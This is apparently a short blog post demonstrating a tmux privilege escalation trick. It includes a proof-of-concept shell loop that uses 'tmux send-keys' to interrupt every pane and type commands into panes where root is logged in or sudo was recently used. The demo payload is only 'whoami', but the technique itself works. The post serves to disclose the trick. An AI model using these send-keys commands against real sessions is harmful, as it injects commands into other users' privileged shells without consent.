tmux privilege escalation abusing send-keys

A script run as user in tmux can under some circumstances execute commands as root.

tl;dr

Did you know you can send keystrokes to other panes in tmux?
You can abuse send-keys to send commands to a root/sudo pane.
That's all there is to it, that's the trick.

send-keys

There's a tmux feature to send keystrokes to a pane.
tmux send-keys -t $pane 'C-c' for example sends SIGINT to whatever is running in pane $pane.

man tmux

When I sae the send-keys feature, I was like:
"What if theres another pane, where the user is logged in as root?"

poc||gtfo

preparations

tmux  
tmux sp  
su # login as root  

Now go back to the other tmux pane (where you are logged in as user).

action

Now run the following script, to execute whoami in every pane:

#!/bin/sh  
for pane in `tmux list-panes | grep -Po '^\d'`; do  
tmux send-keys -t $pane 'C-c'  
tmux send-keys -t $pane 'whoami  
';  
done;  

You will see, as expected, the command whoami returned root.

sudo

With the same trick you can abuse that sudo was used in another pane.

tmux send-keys -t $pane 'sudo whoami  
';  

. . /